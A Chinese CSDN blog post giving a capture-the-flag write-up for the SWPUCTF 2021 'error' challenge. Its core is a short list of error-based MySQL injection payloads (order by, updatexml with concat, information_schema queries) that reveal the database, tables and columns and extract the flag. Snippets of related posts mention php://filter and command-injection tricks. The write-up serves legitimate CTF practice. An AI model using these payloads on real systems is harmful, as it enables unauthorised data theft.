[SWPUCTF 2021 新生赛]error

最新推荐文章于 2024-01-31 10:57:02 发布
最新推荐文章于 2024-01-31 10:57:02 发布
阅读量606 收藏
点赞数 1
文章标签: 数据库 sql mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129338015
版权
文章讲述了在NSSCTF中遇到的SQL注入问题,作者构建了一系列payload来揭露数据库的字段、库名、表名、列名,最终提取出flag。这些payload利用了如orderby,updatexml,concat,database(),information_schema等SQL函数和语法。
摘要由CSDN通过智能技术生成

1.打开环境,查看源码

查看源码,发现数据库后端语句都告诉你了,考点就是报错注入,发现NSSCTF上没有比较好的完整payload,那我写写

payload:

1' order by 4--+#爆字段
1' and updatexml(1,concat(0x7e,database(),0x7e),3)--+#爆库
test_db
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test_db',0x7e limit 0,1),3)--+#爆表
1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='test_tb',0x7e limit 0,1),3)--+#爆列
1' and updatexml(1,concat(0x7e,(select flag from test_tb,0x7e limit 0,1),3)--+#提取flag
#用mid或reverse函数都可以提取完整flag

ha0cker
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1493
。。
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 2万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
error message_errormessage_
10-04
"error message_errormessage_" 这个标题可能是指一个特定的错误处理机制或者函数,其核心是创建一个与具体硬件或系统设备无关的错误传递方式。这样的设计使得程序的错误处理代码更加通用,适应性更强,可以在不同的...
C语言头文件 ERROR
06-11
C语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ERRORC语言头文件 ...
deal-error.py
01-07
deal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_error.pydeal_...
error-prone.rar
02-27
Error-Prone:IDEA插件的使用与理解》 在编程过程中,错误是难以避免的,尤其是在大型项目中,一些潜在的错误可能会在后期引发严重的问题。为了解决这个问题,Google推出了一款名为Error-Prone的静态代码分析工具...
SQUASHFS error问题解决
07-29
本文主要探讨如何解决 "SQUASHFS error: sb_bread failed reading block" 这一常见问题。 SQUASHFS 是一个轻量级、高压缩率的文件系统,常用于嵌入式设备,因其高效的空间利用率而受到青睐。当遇到 "sb_bread ...
xing-CTF-新生-[SWPUCTF 2021]error
最新发布
chinese_cabbage0的博客
01-31 425
这是一段关于使用SQL注入技巧进行数据库攻击的文本。它描述了如何利用union select语句和extractvalue函数来提取数据库中的信息
SWPUCTF 2021 新生
weixin_44770698的博客
12-21 3591
SWPUCTF 2021 新生(日常练习)
[SWPUCTF 2021 新生]finalrce
qq_62046696的博客
05-18 1243
打开之后,发现好多都被过滤掉了,很😵 看别人题解是用到了linux里的tee命令, 可以看到的是没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。 传入 command | tee file.txt。这是格式 ?url=l\s / | tee 1.txt 之后访问我们传入的文件1.txt,发现命令被执行。看见flllllaaaaaaggggggg 本来应该是url=ls..
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1218
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
2021 SWUP新生 wp
XikX_eleven的博客
10-12 1918
2021 SWUP新生 wpWebgift_F12caidao Web gift_F12 如题所示f12找到flag caidao 蚁剑连接(中国菜刀连接可能会显示没有root权限) 根目录flag
[SWPUCTF 2021 新生]easy_sql
zoixsoadji的博客
05-06 1441
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
ctf (error)
Glacier_Mount的博客
07-08 639
extractvalue()函数和substr()函数的简单应用。渗透测试工具sqlmap的简单使用。
CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 2708
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
matlab2021安装error8错误
03-16
Matlab 2021安装时出现Error 8错误可能是由于以下原因: 1. 安装文件损坏或不完整,需要重新下载或从其他来源获取。 2. 安装程序没有足够的权限来访问系统文件或目录,需要以管理员身份运行安装程序。 3. 安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值